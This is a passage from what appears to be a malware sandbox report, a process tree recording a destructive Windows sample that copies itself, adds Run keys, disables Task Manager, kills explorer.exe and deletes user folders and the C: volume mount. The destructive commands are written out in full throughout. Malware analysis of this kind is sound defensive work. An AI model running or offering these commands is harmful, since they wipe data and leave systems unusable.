        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:2336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe 1698005182
        8⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe 1698005182
        9⤵
        Executes dropped EXE
        
        PID:3480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /autoup 1698005182
        10⤵
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /autoup 1698005182
        11⤵
        Adds Run key to start application
        
        PID:6348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
        10⤵
        
        PID:9380
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
        11⤵
        
        PID:6460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:1012
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:13204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:15836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:14284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /KillHardDisk 1698005182
        10⤵
        
        PID:10932
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /KillHardDisk 1698005182
        11⤵
        
        PID:12436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:5532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killMBR 1698005182
        10⤵
        
        PID:10868
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killMBR 1698005182
        11⤵
        
        PID:15036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /protect 1698005182
        10⤵
        
        PID:15420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
        10⤵
        
        PID:15488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+08298.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        8⤵
        
        PID:7260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
        8⤵
        
        PID:8316
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
        9⤵
        
        PID:8820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /autoup 1698005182
        10⤵
        
        PID:7636
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /autoup 1698005182
        11⤵
        
        PID:6428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killwindows 1698005182
        10⤵
        
        PID:10532
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killwindows 1698005182
        11⤵
        
        PID:7068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:12980
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:14652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /KillHardDisk 1698005182
        10⤵
        
        PID:13096
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /KillHardDisk 1698005182
        11⤵
        
        PID:14876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:6068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killMBR 1698005182
        10⤵
        
        PID:10916
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killMBR 1698005182
        11⤵
        
        PID:11684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+728290.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        8⤵
        
        PID:5868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        6⤵
        
        PID:3356
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        6⤵
        
        PID:5648
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:5940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+728290.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        8⤵
        
        PID:3316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+08298.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        8⤵
        
        PID:7364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe 1698005182
        8⤵
        
        PID:5588
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        9⤵
        Kills process with taskkill
        
        PID:7848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
        8⤵
        
        PID:9032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        6⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        7⤵
        Executes dropped EXE
        
        PID:6996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6736
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:7836
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /autoup 1698005182
        6⤵
        
        PID:9052
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /autoup 1698005182
        7⤵
        Adds Run key to start application
        
        PID:6524
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killwindows 1698005182
        6⤵
        
        PID:9656
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killwindows 1698005182
        7⤵
        
        PID:9980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        8⤵
        
        PID:14364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /KillHardDisk 1698005182
        6⤵
        
        PID:10588
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /KillHardDisk 1698005182
        7⤵
        
        PID:11956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:12720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:1156
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        9⤵
        
        PID:14172
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killMBR 1698005182
        6⤵
        
        PID:12700
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killMBR 1698005182
        7⤵
        
        PID:13616
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        6⤵
        
        PID:15044
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        7⤵
        
        PID:15928
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe 1698005182
        5⤵
        Executes dropped EXE
        
        PID:7472
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /autoup 1698005182
        6⤵
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /autoup 1698005182
        7⤵
        
        PID:4752
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /killwindows 1698005182
        6⤵
        
        PID:9204
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /killwindows 1698005182
        7⤵
        
        PID:11304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:12916
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:15308
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /KillHardDisk 1698005182
        6⤵
        
        PID:12256
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /KillHardDisk 1698005182
        7⤵
        
        PID:13488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:14480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:11292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /killMBR 1698005182
        6⤵
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /killMBR 1698005182
        7⤵
        
        PID:1944
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /autoup 1698005182
        6⤵
        
        PID:5228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+81798.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
      4⤵
      PID:384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe 1698005182
      4⤵
      PID:3116
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe 1698005182
        5⤵
        Executes dropped EXE
        
        PID:2832
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        6⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:5408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe 1698005182
        8⤵
        
        PID:7036
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe 1698005182
        9⤵
        Executes dropped EXE
        
        PID:7312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /autoup 1698005182
        10⤵
        
        PID:7584
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /autoup 1698005182
        11⤵
        
        PID:8632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /killwindows 1698005182
        10⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /killwindows 1698005182
        11⤵
        
        PID:4012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /KillHardDisk 1698005182
        10⤵
        
        PID:11684
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /KillHardDisk 1698005182
        11⤵
        
        PID:10928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:14524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /killMBR 1698005182
        10⤵
        
        PID:12228
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /killMBR 1698005182
        11⤵
        
        PID:6664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /autoup 1698005182
        10⤵
        
        PID:3508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+412224.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3084.exe
        8⤵
        
        PID:8100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+16270.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        8⤵
        
        PID:5248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3084.exe 1698005182
        8⤵
        
        PID:9100
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
        6⤵
        
        PID:5576
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
        7⤵
        Executes dropped EXE
        
        PID:6044
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        6⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:7024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+131858.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        8⤵
        
        PID:8620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe 1698005182
        8⤵
        
        PID:10028
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe 1698005182
        9⤵
        
        PID:7988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:6124
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:7628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /autoup 1698005182
        10⤵
        
        PID:10940
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /autoup 1698005182
        11⤵
        
        PID:12340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /killwindows 1698005182
        10⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /killwindows 1698005182
        11⤵
        
        PID:14800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /KillHardDisk 1698005182
        10⤵
        
        PID:12688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe /protect 1698005182
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:5056
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
        6⤵
        
        PID:6356
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
        7⤵
        Executes dropped EXE
        
        PID:7336
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6880
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:9196
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /autoup 1698005182
        6⤵
        
        PID:6444
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /autoup 1698005182
        7⤵
        Adds Run key to start application
        
        PID:5976
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killwindows 1698005182
        6⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killwindows 1698005182
        7⤵
        
        PID:10540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:9848
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:11388
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /KillHardDisk 1698005182
        6⤵
        
        PID:9308
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /KillHardDisk 1698005182
        7⤵
        
        PID:12748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:13448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:16252
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killMBR 1698005182
        6⤵
        
        PID:13344
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killMBR 1698005182
        7⤵
        
        PID:15092
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        6⤵
        
        PID:15436
      - C:\Windows\system32\cmd.exe
        
